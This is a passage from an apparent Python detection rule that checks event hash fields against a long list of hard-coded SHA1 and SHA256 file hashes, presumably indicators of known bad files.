            "SHA1=a2fe7de67b3f7d4b1def88ce4ba080f473c0fbc6" in event.deep_get("Hashes", default=""),
            "SHA1=b8b123a413b7bccfa8433deba4f88669c969b543" in event.deep_get("Hashes", default=""),
            "SHA1=bf2f8ada4e80aed4710993cedf4c5d32c95cd509" in event.deep_get("Hashes", default=""),
            "SHA1=e3a1e7ce9e9452966885371e4c7fb48a2efdef22" in event.deep_get("Hashes", default=""),
            "SHA1=c7f0423ac5569f13d2b195e02741ad7eed839c6d" in event.deep_get("Hashes", default=""),
            "SHA1=a111dc6ae5575977feba71ee69b790e056846a02" in event.deep_get("Hashes", default=""),
            "SHA1=ac4ace1c21c5cb72c6edf6f2f0cc3513d7c942c3" in event.deep_get("Hashes", default=""),
            "SHA1=d4304bc75c2cb9917bb10a1dc630b75af194f7b2" in event.deep_get("Hashes", default=""),
            "SHA1=0de86ec7d7f16a3680df89256548301eed970393" in event.deep_get("Hashes", default=""),
            "SHA1=b2fb5036b29b12bcec04c3152b65b67ca14d61f2" in event.deep_get("Hashes", default=""),
            "SHA1=0883a9c54e8442a551994989db6fc694f1086d41" in event.deep_get("Hashes", default=""),
            "SHA1=01cf1fe3937fb6585ffb468b116a3af8ddf9ef16" in event.deep_get("Hashes", default=""),
            "SHA1=98c4406fede34c3704afd8cf536ec20d93df9a10" in event.deep_get("Hashes", default=""),
            "SHA1=1048f641adf3988d882a159bf1332eeb6d6a7f09" in event.deep_get("Hashes", default=""),
            "SHA1=867652e062eb6bd1b9fc29e74dea3edd611ef40c" in event.deep_get("Hashes", default=""),
            "SHA1=78fd06c82d3ba765c38bad8f48d1821a06280e39" in event.deep_get("Hashes", default=""),
            "SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c" in event.deep_get("Hashes", default=""),
            "SHA1=fdbcebb6cafda927d384d7be2e8063a4377d884f" in event.deep_get("Hashes", default=""),
            "SHA1=994dc79255aeb662a672a1814280de73d405617a" in event.deep_get("Hashes", default=""),
            "SHA1=6abc7979ba044f31884517827afb7b4bdaa0dcc1" in event.deep_get("Hashes", default=""),
            "SHA1=1768f9c780fe7cf66928cfceaef8ed7d985e18f5" in event.deep_get("Hashes", default=""),
            "SHA1=5fa527e679d25a15ecc913ce6a8d0218e2ff174b" in event.deep_get("Hashes", default=""),
            "SHA1=f11188c540eada726766e0b0b2f9dd3ae2679c61" in event.deep_get("Hashes", default=""),
            "SHA1=8416ee8fd88c3d069fbba90e959507c69a0ee3e9" in event.deep_get("Hashes", default=""),
            "SHA1=ab4399647ebd16c02728c702534a30eb0b7ccbe7" in event.deep_get("Hashes", default=""),
            "SHA1=98588b1d1b63747fa6ee406983bf50ad48a2208b" in event.deep_get("Hashes", default=""),
            "SHA1=86e6669dbbce8228e94b2a9f86efdf528f0714fd" in event.deep_get("Hashes", default=""),
            "SHA1=c9e9198d52d94771cb14711a5f6aaf8d82b602a2" in event.deep_get("Hashes", default=""),
            "SHA1=17fa047c1f979b180644906fe9265f21af5b0509" in event.deep_get("Hashes", default=""),
            "SHA1=1b526cbcba09b8d663e82004cf24ef44343030d3" in event.deep_get("Hashes", default=""),
            "SHA1=4e0f5576804dab14abb29a29edb9616a1dbe280a" in event.deep_get("Hashes", default=""),
            "SHA1=eb76de59ebc5b2258cff0567577ff8c9d0042048" in event.deep_get("Hashes", default=""),
            "SHA1=d4f5323da704ff2f25d6b97f38763c147f2a0e6f" in event.deep_get("Hashes", default=""),
            "SHA1=6802e2d2d4e6ee38aa513dafd6840e864310513b" in event.deep_get("Hashes", default=""),
            "SHA1=ac18c7847c32957abe8155bcbe71c1f35753b527" in event.deep_get("Hashes", default=""),
            "SHA1=beed6fb6a96996e9b016fa7f2cf7702a49c8f130" in event.deep_get("Hashes", default=""),
            "SHA1=7d453dccb25bf36c411c92e2744c24f9b801225d" in event.deep_get("Hashes", default=""),
            "SHA1=9648ad90ec683c63cc02a99111a002f9b00478d1" in event.deep_get("Hashes", default=""),
            "SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a" in event.deep_get("Hashes", default=""),
            "SHA1=31fac347aa26e92db4d8c9e1ba37a7c7a2234f08" in event.deep_get("Hashes", default=""),
            "SHA1=fde0fff1c3e4c053148748504d4b9e0cc97f37ec" in event.deep_get("Hashes", default=""),
            "SHA1=73bac306292b4e9107147db94d0d836fdb071e33" in event.deep_get("Hashes", default=""),
            "SHA1=9382981b05b1fb950245313992444bfa0db5f881" in event.deep_get("Hashes", default=""),
            "SHA1=acb8e45ebd1252313ece94198df47edf9294e7d3" in event.deep_get("Hashes", default=""),
            "SHA1=9c36600c2640007d3410dea8017573a113374873" in event.deep_get("Hashes", default=""),
            "SHA1=53f776d9a183c42b93960b270dddeafba74eb3fb" in event.deep_get("Hashes", default=""),
            "SHA1=1fdb2474908bdd2ee1e9bd3f224626f9361caab7" in event.deep_get("Hashes", default=""),
            "SHA1=3533d0a54c7ccd83afd6be24f6582b30e4ca0aab" in event.deep_get("Hashes", default=""),
            "SHA1=cb25a5125fb353496b59b910263209f273f3552d" in event.deep_get("Hashes", default=""),
            "SHA1=a5f1b56615bdaabf803219613f43671233f2001c" in event.deep_get("Hashes", default=""),
            "SHA1=6c7663de88a0fba1f63a984f926c6ef449059e38" in event.deep_get("Hashes", default=""),
            "SHA1=e514dfadbeb4d2305988c3281bf105d252dee3a7" in event.deep_get("Hashes", default=""),
            "SHA1=632c80a3c95cf589b03812539dea59594eaefae0" in event.deep_get("Hashes", default=""),
            "SHA1=e6966e360038be3b9d8c9b2582eba4e263796084" in event.deep_get("Hashes", default=""),
            "SHA1=675cc00de7c1ef508ccd0c91770c82342c0ad4ab" in event.deep_get("Hashes", default=""),
            "SHA1=6ae26bde7ec27bd0fa971de6c7500eee34ee9b51" in event.deep_get("Hashes", default=""),
            "SHA1=80e4808a7fe752cac444676dbbee174367fa2083" in event.deep_get("Hashes", default=""),
            "SHA1=77b4f0c0b06e3dc2474d5e250b772dacaac14dd0" in event.deep_get("Hashes", default=""),
            "SHA1=7277d965b9de91b4d8ea5eb8ae7fa3899eef63a2" in event.deep_get("Hashes", default=""),
            "SHA1=3825ebb0b0664b5f0789371240f65231693be37d" in event.deep_get("Hashes", default=""),
            "SHA1=de9469a5d01fb84afd41d176f363a66e410d46da" in event.deep_get("Hashes", default=""),
            "SHA1=91568d7a82cc7677f6b13f11bea5c40cf12d281b" in event.deep_get("Hashes", default=""),
            "SHA1=4b882748faf2c6c360884c6812dd5bcbce75ebff" in event.deep_get("Hashes", default=""),
            "SHA1=599de57a5c05e27bb72c7b8a677e531d8e4bf8b5" in event.deep_get("Hashes", default=""),
            "SHA1=1d373361d3129d11bc43f9b6dfa81d06e5ca8358" in event.deep_get("Hashes", default=""),
            "SHA1=c5bd9f2b3a51ba0da08d7c84bab1f2d03a95e405" in event.deep_get("Hashes", default=""),
            "SHA1=89165bbb761d6742ac2a6f5efbffc80c17990bd8" in event.deep_get("Hashes", default=""),
            "SHA1=97812f334a077c40e8e642bb9872ac2c49ddb9a2" in event.deep_get("Hashes", default=""),
            "SHA1=d417c0be261b0c6f44afdec3d5432100e420c3ed" in event.deep_get("Hashes", default=""),
            "SHA1=37e6450c7cd6999d080da94b867ba23faa8c32fe" in event.deep_get("Hashes", default=""),
            "SHA1=9481cd590c69544c197b4ee055056302978a7191" in event.deep_get("Hashes", default=""),
            "SHA1=ff3e19cd461ddf67529a765cbec9cb81d84dc7da" in event.deep_get("Hashes", default=""),
            "SHA1=6972314b6d6b0109b9d0a951eb06041f531f589b" in event.deep_get("Hashes", default=""),
            "SHA1=dd94a2436994ac35db91e0ec9438b95e438d38c5" in event.deep_get("Hashes", default=""),
            "SHA1=dcc852461895311b56e3ae774c8e90782a79c0b4" in event.deep_get("Hashes", default=""),
            "SHA1=3489ed43bdd11ccbfc892baaeae8102ff7d22f25" in event.deep_get("Hashes", default=""),
            "SHA1=e38e1efd98cd8a3cdb327d386db8df79ea08dccc" in event.deep_get("Hashes", default=""),
            "SHA1=d4cf9296271a9c5c40b0fa34f69b6125c2d14457" in event.deep_get("Hashes", default=""),
            "SHA1=10fb4ba6b2585ea02e7afb53ff34bf184eeb1a5d" in event.deep_get("Hashes", default=""),
            "SHA1=f6793243ad20359d8be40d3accac168a15a327fb" in event.deep_get("Hashes", default=""),
            "SHA1=b34a012887ddab761b2298f882858fa1ff4d99f1" in event.deep_get("Hashes", default=""),
            "SHA1=71469dce9c2f38d0e0243a289f915131bf6dd2a8" in event.deep_get("Hashes", default=""),
            "SHA1=10115219e3595b93204c70eec6db3e68a93f3144" in event.deep_get("Hashes", default=""),
            "SHA1=161bae224cf184ed6c09c77fae866d42412c6d25" in event.deep_get("Hashes", default=""),
            "SHA1=07f78a47f447e4d8a72ad4bc6a26427b9577ec82" in event.deep_get("Hashes", default=""),
            "SHA1=2929de0b5b5e1ba1cce1908e9d800aa21f448b3d" in event.deep_get("Hashes", default=""),
            "SHA1=745335bcdf02fb42df7d890a24858e16094f48fd" in event.deep_get("Hashes", default=""),
            "SHA1=2a202830db58d5e942e4f6609228b14095ed2cab" in event.deep_get("Hashes", default=""),
            "SHA1=0167259abd9231c29bec32e6106ca93a13999f90" in event.deep_get("Hashes", default=""),
            "SHA1=c23eeb6f18f626ce1fd840227f351fa7543bb167" in event.deep_get("Hashes", default=""),
            "SHA1=613a9df389ad612a5187632d679da11d60f6046a" in event.deep_get("Hashes", default=""),
            "SHA1=1ce17c54c6884b0319d5aabbe7f96221f4838514" in event.deep_get("Hashes", default=""),
            "SHA1=025c4e1a9c58bf10be99f6562476b7a0166c6b86" in event.deep_get("Hashes", default=""),
            "SHA1=c3aafe8f67c6738489377031cb5a1197e99b202d" in event.deep_get("Hashes", default=""),
            "SHA1=50c6b3cafc35462009d02c10f2e79373936dd7bb" in event.deep_get("Hashes", default=""),
            "SHA1=6df35a0c2f6d7d39d24277137ea840078dafb812" in event.deep_get("Hashes", default=""),
            "SHA1=f92faed3ef92fa5bc88ebc1725221be5d7425528" in event.deep_get("Hashes", default=""),
            "SHA1=3bd1a88cc7dae701bc7085639e1c26ded3f8ccb3" in event.deep_get("Hashes", default=""),
            "SHA1=a3ed5cbfbc17b58243289f3cf575bf04be49591d" in event.deep_get("Hashes", default=""),
            "SHA1=552730553a1dea0290710465fb8189bdd0eaad42" in event.deep_get("Hashes", default=""),
            "SHA1=0291d0457acaf0fe8ed5c3137302390469ce8b35" in event.deep_get("Hashes", default=""),
            "SHA1=07f282db28771838d0e75d6618f70d76acfe6082" in event.deep_get("Hashes", default=""),
            "SHA1=e6765d8866cad6193df1507c18f31fa7f723ca3e" in event.deep_get("Hashes", default=""),
            "SHA1=22c9da04847c26188226c3a345e2126ef00aa19e" in event.deep_get("Hashes", default=""),
            "SHA1=43501832ce50ccaba2706be852813d51de5a900f" in event.deep_get("Hashes", default=""),
            "SHA1=cb3f30809b05cf02bc29d4a7796fb0650271e542" in event.deep_get("Hashes", default=""),
            "SHA1=ed86bb62893e6ffcdfd2ecae2dea77fdf6bf9bde" in event.deep_get("Hashes", default=""),
            "SHA1=3b6b35bca1b05fafbfc883a844df6d52af44ccdc" in event.deep_get("Hashes", default=""),
            "SHA1=928b5971a0f7525209d599e2ef15c31717047022" in event.deep_get("Hashes", default=""),
            "SHA1=b5696e2183d9387776820ef3afa388200f08f5a6" in event.deep_get("Hashes", default=""),
            "SHA1=ebd8b7e964b8c692eea4a8c406b9cd0be621ebe2" in event.deep_get("Hashes", default=""),
            "SHA1=fe18c58fbd0a83d67920e037d522c176704d2ca3" in event.deep_get("Hashes", default=""),
            "SHA1=9c1c9032aa1e33461f35dbf79b6f2d061bfc6774" in event.deep_get("Hashes", default=""),
            "SHA1=8e126f4f35e228fdd3aa78d533225db7122d8945" in event.deep_get("Hashes", default=""),
            "SHA1=064de88dbbea67c149e779aac05228e5405985c7" in event.deep_get("Hashes", default=""),
            "SHA1=30a80f560f18609c1123636a8a1a1ef567fa67a7" in event.deep_get("Hashes", default=""),
            "SHA1=98130128685c8640a8a8391cb4718e98dd8fe542" in event.deep_get("Hashes", default=""),
            "SHA1=a5914161f8a885702427cf75443fb08d28d904f0" in event.deep_get("Hashes", default=""),
            "SHA1=48f03a13b0f6d3d929a86514ce48a9352ffef5ad" in event.deep_get("Hashes", default=""),
            "SHA1=fff4f28287677caabc60c8ab36786c370226588d" in event.deep_get("Hashes", default=""),
            "SHA1=bb5b17cff0b9e15f1648b4136e95bd20d899aef5" in event.deep_get("Hashes", default=""),
            "SHA1=b2f5d3318aab69e6e0ca8da4a4733849e3f1cee2" in event.deep_get("Hashes", default=""),
            "SHA1=635a39ff5066e1ac7c1c5995d476d8c233966dda" in event.deep_get("Hashes", default=""),
            "SHA1=5ed22c0033aed380aa154e672e8db3a2d4c195c4" in event.deep_get("Hashes", default=""),
            "SHA1=87e20486e804bfff393cc9ad9659858e130402a2" in event.deep_get("Hashes", default=""),
            "SHA1=4dd86ff6f7180abebcb92e556a486abe7132754c" in event.deep_get("Hashes", default=""),
            "SHA1=39169c9b79502251ca2155c8f1cd7e63fd9a42e9" in event.deep_get("Hashes", default=""),
            "SHA1=7f7d144cc80129d0db3159ea5d4294c34b79b20a" in event.deep_get("Hashes", default=""),
            "SHA1=8692274681e8d10c26ddf2b993f31974b04f5bf0" in event.deep_get("Hashes", default=""),
            "SHA1=ea4a405445bb6e58c16b81f6d5d2c9a9edde419b" in event.deep_get("Hashes", default=""),
            "SHA1=da970a01cecff33a99c217a42297cec4d1fe66d6" in event.deep_get("Hashes", default=""),
            "SHA1=1f3799fed3cf43254fe30dcdfdb8dc02d82e662b" in event.deep_get("Hashes", default=""),
            "SHA1=3d2309f7c937bfcae86097d716a8ef66c1337a3c" in event.deep_get("Hashes", default=""),
            "SHA1=02a9314109e47c5ce52fa553ea57070bf0f8186a" in event.deep_get("Hashes", default=""),
            "SHA1=91f832f46e4c38ecc9335460d46f6f71352cffed" in event.deep_get("Hashes", default=""),
            "SHA1=76568d987f8603339b8d1958f76de2b957811f66" in event.deep_get("Hashes", default=""),
            "SHA1=e841c8494b715b27b33be6f800ca290628507aba" in event.deep_get("Hashes", default=""),
            "SHA1=b555aad38df7605985462f3899572931ee126259" in event.deep_get("Hashes", default=""),
            "SHA1=115edd175c346fd3fbc9f113ee5ccd03b5511ee1" in event.deep_get("Hashes", default=""),
            "SHA1=3d27013557b5e68e7212a2f78dfe60c5a2a46327" in event.deep_get("Hashes", default=""),
            "SHA1=bb6ef5518df35d9508673d5011138add8c30fc27" in event.deep_get("Hashes", default=""),
            "SHA1=9086e670e3a4518c0bcdf0da131748d4085ef42b" in event.deep_get("Hashes", default=""),
            "SHA1=f6728821eddd14a21a9536e0f138c6d71cbd9307" in event.deep_get("Hashes", default=""),
            "SHA1=34b677fba9dcab9a9016332b3332ce57f5796860" in event.deep_get("Hashes", default=""),
            "SHA1=a63e9ecdebaf4ef9c9ec3362ff110b8859cc396d" in event.deep_get("Hashes", default=""),
            "SHA1=8cd9df52b20b8f792ac53f57763dc147d7782b1e" in event.deep_get("Hashes", default=""),
            "SHA1=fcae2ea5990189f6f230b51e398e3000b71897f2" in event.deep_get("Hashes", default=""),
            "SHA1=27371f45f42383029c3c2e6d64a22e35dc772a72" in event.deep_get("Hashes", default=""),
            "SHA1=b6eb40ea52b47f03edb8f45e2e431b5f666df8c5" in event.deep_get("Hashes", default=""),
            "SHA1=9f27987c32321f8da099efc1dc60a73f8f629d3a" in event.deep_get("Hashes", default=""),
            "SHA1=40372b4de2db020ce2659e1de806d4338fd7ebef" in event.deep_get("Hashes", default=""),
            "SHA1=18693de1487c55e374b46a7728b5bf43300d4f69" in event.deep_get("Hashes", default=""),
            "SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98" in event.deep_get("Hashes", default=""),
            "SHA1=005754dab657ddc6dae28eee313ca2cc6a0c375c" in event.deep_get("Hashes", default=""),
            "SHA1=0bec69c1b22603e9a385495fbe94700ac36b28e5" in event.deep_get("Hashes", default=""),
            "SHA1=bd39ef9c758e2d9d6037e067fbb2c1f2ac7feac8" in event.deep_get("Hashes", default=""),
            "SHA1=23f562f8d5650b2fb92382d228013f2e36e35d6c" in event.deep_get("Hashes", default=""),
            "SHA1=a48aa80942fc8e0699f518de4fd6512e341d4196" in event.deep_get("Hashes", default=""),
            "SHA1=e42bd2f585c00a1d6557df405246081f89542d15" in event.deep_get("Hashes", default=""),
            "SHA1=bf5515fcf120c2548355d607cfd57e9b3e0af6e9" in event.deep_get("Hashes", default=""),
            "SHA1=89a74d0e9fd03129082c5b868f5ad62558ca34fd" in event.deep_get("Hashes", default=""),
            "SHA1=948368fe309652e8d88088d23e1df39e9c2b6649" in event.deep_get("Hashes", default=""),
            "SHA1=a14cd928c60495777629be283c1d5b8ebbab8c0d" in event.deep_get("Hashes", default=""),
            "SHA1=1f25f54e9b289f76604e81e98483309612c5a471" in event.deep_get("Hashes", default=""),
            "SHA1=25bf4e30a94df9b8f8ab900d1a43fd056d285c9d" in event.deep_get("Hashes", default=""),
            "SHA1=d1fb740210c1fa2a52f6748b0588ae77de590b9d" in event.deep_get("Hashes", default=""),
            "SHA1=dac68b8ee002d5bb61be3d59908a61a26efb7c09" in event.deep_get("Hashes", default=""),
            "SHA1=a56598e841ae694ac78c37bf4f8c09f9eaf3271f" in event.deep_get("Hashes", default=""),
            "SHA1=465abe9634c199a5f80f8a4f77ec3118c0d69652" in event.deep_get("Hashes", default=""),
            "SHA1=a0cefb5b55f7a7a145b549613e26b6805515a1ad" in event.deep_get("Hashes", default=""),
            "SHA1=36dca91fb4595de38418dffc3506dc78d7388c2c" in event.deep_get("Hashes", default=""),
            "SHA1=92138cfc14f9e2271f641547e031d5d63c6de19a" in event.deep_get("Hashes", default=""),
            "SHA1=fcf9978cf1af2e9b1e2eaf509513664dfcc1847b" in event.deep_get("Hashes", default=""),
            "SHA1=d02403f85be6f243054395a873b41ef8a17ea279" in event.deep_get("Hashes", default=""),
            "SHA1=4da007dd298723f920e194501bb49bab769dfb14" in event.deep_get("Hashes", default=""),
            "SHA1=85076aa3bffb40339021286b73d72dd5a8e4396a" in event.deep_get("Hashes", default=""),
            "SHA1=221717a48ee8e2d19470579c987674f661869e17" in event.deep_get("Hashes", default=""),
            "SHA1=a249278a668d4df30af9f5d67ebb7d2cd160beaa" in event.deep_get("Hashes", default=""),
            "SHA1=6b5aa51f4717d123a468e9e9d3d154e20ca39d56" in event.deep_get("Hashes", default=""),
            "SHA1=b5a8e2104d76dbb04cd9ffe86784113585822375" in event.deep_get("Hashes", default=""),
            "SHA1=02534b5b510d978bac823461a39f76b4f0ac5aa3" in event.deep_get("Hashes", default=""),
            "SHA1=538bb45f30035f39d41bd13818fe0c0061182cfe" in event.deep_get("Hashes", default=""),
            "SHA1=6d09d826581baa1817be6fbd44426db9b05f1909" in event.deep_get("Hashes", default=""),
            "SHA1=197811ec137e9916e6692fc5c28f6d6609ffc20e" in event.deep_get("Hashes", default=""),
            "SHA1=c3ca396b5af2064c6f7d05fa0fb697e68d0b9631" in event.deep_get("Hashes", default=""),
            "SHA1=cf9baf57e16b73d7a4a99dd0c092870deba1a997" in event.deep_get("Hashes", default=""),
            "SHA1=0320534df24a37a245a0b09679a5adb27018fb5f" in event.deep_get("Hashes", default=""),
            "SHA1=4c8349c6345c8d6101fb896ea0a74d0484c56df0" in event.deep_get("Hashes", default=""),
            "SHA1=9b2ef5f7429d62342163e001c7c13fb866dbe1ef" in event.deep_get("Hashes", default=""),
            "SHA1=6abbc3003c7aa69ce79cbbcd2e3210b07f21d202" in event.deep_get("Hashes", default=""),
            "SHA1=062457182ab08594c631a3f897aeb03c6097eb77" in event.deep_get("Hashes", default=""),
            "SHA1=947c76c8c8ba969797f56afd1fa1d1c4a1e3ed25" in event.deep_get("Hashes", default=""),
            "SHA1=d6de8211dba7074d92b5830618176a3eb8eb6670" in event.deep_get("Hashes", default=""),
            "SHA1=8302802b709ad242a81b939b6c90b3230e1a1f1e" in event.deep_get("Hashes", default=""),
            "SHA1=492e40b01a9a6cec593691db4838f20b3eaeacc5" in event.deep_get("Hashes", default=""),
            "SHA1=83506de48bd0c50ea00c9e889fe980f56e6c6e1b" in event.deep_get("Hashes", default=""),
            "SHA1=fe54a1acc5438883e5c1bba87b78bb7322e2c739" in event.deep_get("Hashes", default=""),
            "SHA1=020580278d74d0fe741b0f786d8dca7554359997" in event.deep_get("Hashes", default=""),
            "SHA1=3c1c3f5f5081127229ba0019fbf0efc2a9c1d677" in event.deep_get("Hashes", default=""),
            "SHA1=e2d98e0e178880f10434059096f936b2c06ed8f4" in event.deep_get("Hashes", default=""),
            "SHA1=03506a2f87d1523e844fba22e7617ab2a218b4b7" in event.deep_get("Hashes", default=""),
            "SHA1=fee00dde8080c278a4c4a6d85a5601edc85a1b3d" in event.deep_get("Hashes", default=""),
            "SHA1=ba430f3c77e58a4dc1a9a9619457d1c45a19617f" in event.deep_get("Hashes", default=""),
            "SHA1=c257aa4094539719a3c7b7950598ef872dbf9518" in event.deep_get("Hashes", default=""),
            "SHA1=bc62fe2b38008f154fc9ea65d851947581b52f49" in event.deep_get("Hashes", default=""),
            "SHA1=fe237869b2b496deb52c0bc718ada47b36fc052e" in event.deep_get("Hashes", default=""),
            "SHA1=0a62c574603158d2d0c3be2a43c6bb0074ed297c" in event.deep_get("Hashes", default=""),
            "SHA1=86f34eaea117f629297218a4d196b5729e72d7b9" in event.deep_get("Hashes", default=""),
            "SHA1=e0b263f2d9c08f27c6edf5a25aa67a65c88692b0" in event.deep_get("Hashes", default=""),
            "SHA256=9dc7beb60a0a6e7238fc8589b6c2665331be1e807b4d2b3ddd1c258dbbd3e2f7"
            in event.deep_get("Hashes", default=""),
            "SHA256=06ddf49ac8e06e6b83fccba1141c90ea01b65b7db592c54ffe8aa6d30a75c0b8"
            in event.deep_get("Hashes", default=""),
            "SHA256=822982c568b6f44b610f8dc4ab5d94795c33ae08a6a608050941264975c1ecdb"
            in event.deep_get("Hashes", default=""),
            "SHA256=082a79311da64b6adc3655e79aa090a9262acaac3b917a363b9571f520a17f6a"
            in event.deep_get("Hashes", default=""),
            "SHA256=618b15970671700188f4102e5d0638184e2723e8f57f7e917fa49792daebdadb"
            in event.deep_get("Hashes", default=""),
            "SHA256=5b932eab6c67f62f097a3249477ac46d80ddccdc52654f8674060b4ddf638e5d"
            in event.deep_get("Hashes", default=""),
            "SHA256=82ac05fefaa8c7ee622d11d1a378f1d255b647ab2f3200fd323cc374818a83f2"
            in event.deep_get("Hashes", default=""),
            "SHA256=29d765e29d2f06eb511ee88b2e514c9df1a9020a768ddd3d2278d9045e9cdb4a"
            in event.deep_get("Hashes", default=""),
            "SHA256=f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212"
            in event.deep_get("Hashes", default=""),
            "SHA256=beef40f1b4ce0ff2ee5c264955e6b2a0de6fe4089307510378adc83fad77228b"
            in event.deep_get("Hashes", default=""),
            "SHA256=9a42fa1870472c38a56c0a70f62e57a3cdc0f5bc142f3a400d897b85d65800ac"
            in event.deep_get("Hashes", default=""),
            "SHA256=f03f0fb3a26bb83e8f8fa426744cf06f2e6e29f5220663b1d64265952b8de1a1"
            in event.deep_get("Hashes", default=""),
            "SHA256=50819a1add4c81c0d53203592d6803f022443440935ff8260ff3b6d5253c0c76"
            in event.deep_get("Hashes", default=""),
            "SHA256=6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421"
            in event.deep_get("Hashes", default=""),
            "SHA256=575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316"
            in event.deep_get("Hashes", default=""),
            "SHA256=26bea3b3ab2001d91202f289b7e41499d810474607db7a0893ceab74f5532f47"
            in event.deep_get("Hashes", default=""),
            "SHA256=b169a5f643524d59330fafe6e3e328e2179fc5116ee6fae5d39581467d53ac03"
            in event.deep_get("Hashes", default=""),
            "SHA256=b8807e365be2813b7eccd2e4c49afb0d1e131086715638b7a6307cd7d7e9556c"
            in event.deep_get("Hashes", default=""),
            "SHA256=28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553"
            in event.deep_get("Hashes", default=""),
            "SHA256=9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87"
            in event.deep_get("Hashes", default=""),
            "SHA256=8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330"
            in event.deep_get("Hashes", default=""),
            "SHA256=a32dc2218fb1f538fba33701dfd9ca34267fda3181e82eb58b971ae8b78f0852"
            in event.deep_get("Hashes", default=""),
            "SHA256=2c14bea0d85c9cad5c5f5c8d0e5442f6deb9e93fe3ad8ea5e8e147821c6f9304"
            in event.deep_get("Hashes", default=""),
            "SHA256=23e89fd30a1c7db37f3ea81b779ce9acf8a4294397cbb54cff350d54afcfd931"
            in event.deep_get("Hashes", default=""),
            "SHA256=f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d"
            in event.deep_get("Hashes", default=""),
            "SHA256=b0a27ac1a8173413de13860d2b2e34cb6bc4d1149f94b62d319042e11d8b004c"
            in event.deep_get("Hashes", default=""),
            "SHA256=897f2bbe81fc3b1ae488114b93f3eb0133a85678d061c7a6f718507971f33736"
            in event.deep_get("Hashes", default=""),
            "SHA256=497a836693be1b330993e2be64f6c71bf290c127faca1c056abd0dc374654830"
            in event.deep_get("Hashes", default=""),
            "SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104"
            in event.deep_get("Hashes", default=""),
            "SHA256=f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a"
            in event.deep_get("Hashes", default=""),
            "SHA256=40556dd9b79b755cc0b48d3d024ceb15bd2c0e04960062ab2a85cd7d4d1b724a"
            in event.deep_get("Hashes", default=""),
            "SHA256=ac5fb90e88d8870cd5569e661bea98cf6b001d83ab7c65a5196ea3743146939a"
            in event.deep_get("Hashes", default=""),
            "SHA256=12b0000698b79ea3c8178b9e87801cc34bad096a151a8779559519deafd4e3f0"
            in event.deep_get("Hashes", default=""),
            "SHA256=9e56e96df36237e65b3d7dbc490afdc826215158f6278cd579c576c4b455b392"
            in event.deep_get("Hashes", default=""),
            "SHA256=ec96b15ce218f97ec1d8f07f13b052d274c4c8438f31daf246ccfaaee5e1bebd"
            in event.deep_get("Hashes", default=""),
            "SHA256=da70fa44290f949e9b3e0fcfe0503de46e82e0472e8e3c360da3fd2bfa364eee"
            in event.deep_get("Hashes", default=""),
            "SHA256=accb1a6604efb1b3ce9345c9fd62fe717a84c3e089e09c638e461df89193ef01"
            in event.deep_get("Hashes", default=""),
            "SHA256=083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254"
            in event.deep_get("Hashes", default=""),
            "SHA256=c7bccc6f38403def4690e00a0b31eda05973d82be8953a3379e331658c51b231"
            in event.deep_get("Hashes", default=""),
            "SHA256=0740359baef32cbb0b14a9d1bd3499ea2e770ff9b1c85898cfac8fd9aca4fa39"
            in event.deep_get("Hashes", default=""),
            "SHA256=32882949ea084434a376451ff8364243a50485a3b4af2f2240bb5f20c164543d"
            in event.deep_get("Hashes", default=""),
            "SHA256=3ca5d47d076e99c312578ef6499e1fa7b9db88551cfc0f138da11105aca7c5e1"
            in event.deep_get("Hashes", default=""),
            "SHA256=f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae"
            in event.deep_get("Hashes", default=""),
            "SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4"
            in event.deep_get("Hashes", default=""),
            "SHA256=8922be14c657e603179f1dd94dc32de7c99d2268ac92d429c4fdda7396c32e50"
            in event.deep_get("Hashes", default=""),
            "SHA256=aafa642ca3d906138150059eeddb6f6b4fe9ad90c6174386cfe13a13e8be47d9"
            in event.deep_get("Hashes", default=""),
            "SHA256=087270d57f1626f29ba9c25750ca19838a869b73a1f71af50bdf37d6ff776212"
            in event.deep_get("Hashes", default=""),
            "SHA256=008fa89822b7a1f91e5843169083202ea580f7b06eb6d5cae091ba844d035f25"
            in event.deep_get("Hashes", default=""),
            "SHA256=b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09"
            in event.deep_get("Hashes", default=""),
            "SHA256=dfc80e0d468a2c115a902aa332a97e3d279b1fc3d32083e8cf9a4aadf3f54ad1"
            in event.deep_get("Hashes", default=""),
            "SHA256=0d10c4b2f56364b475b60bd2933273c8b1ed2176353e59e65f968c61e93b7d99"
            in event.deep_get("Hashes", default=""),
            "SHA256=5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae"
            in event.deep_get("Hashes", default=""),
            "SHA256=36c65aeb255c06898ffe32e301030e0b74c8bca6fe7be593584b8fdaacd4e475"
            in event.deep_get("Hashes", default=""),
            "SHA256=30e083cd7616b1b969a92fd18cf03097735596cce7fcf3254b2ca344e526acc2"
            in event.deep_get("Hashes", default=""),
            "SHA256=15cf366f7b3ee526db7ce2b5253ffebcbfaa4f33a82b459237c049f854a97c0c"
            in event.deep_get("Hashes", default=""),
            "SHA256=be70be9d84ae14ea1fa5ec68e2a61f6acfe576d965fe51c6bac78fba01a744fb"
            in event.deep_get("Hashes", default=""),
            "SHA256=7b846b0a717665e4d9fb313f25d1f6a5b782e495387aea45cf87ad3c049ac0db"
            in event.deep_get("Hashes", default=""),
            "SHA256=85b9d7344bf847349b5d58ebe4d44fd63679a36164505271593ef1076aa163b2"
            in event.deep_get("Hashes", default=""),
            "SHA256=749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c"
            in event.deep_get("Hashes", default=""),
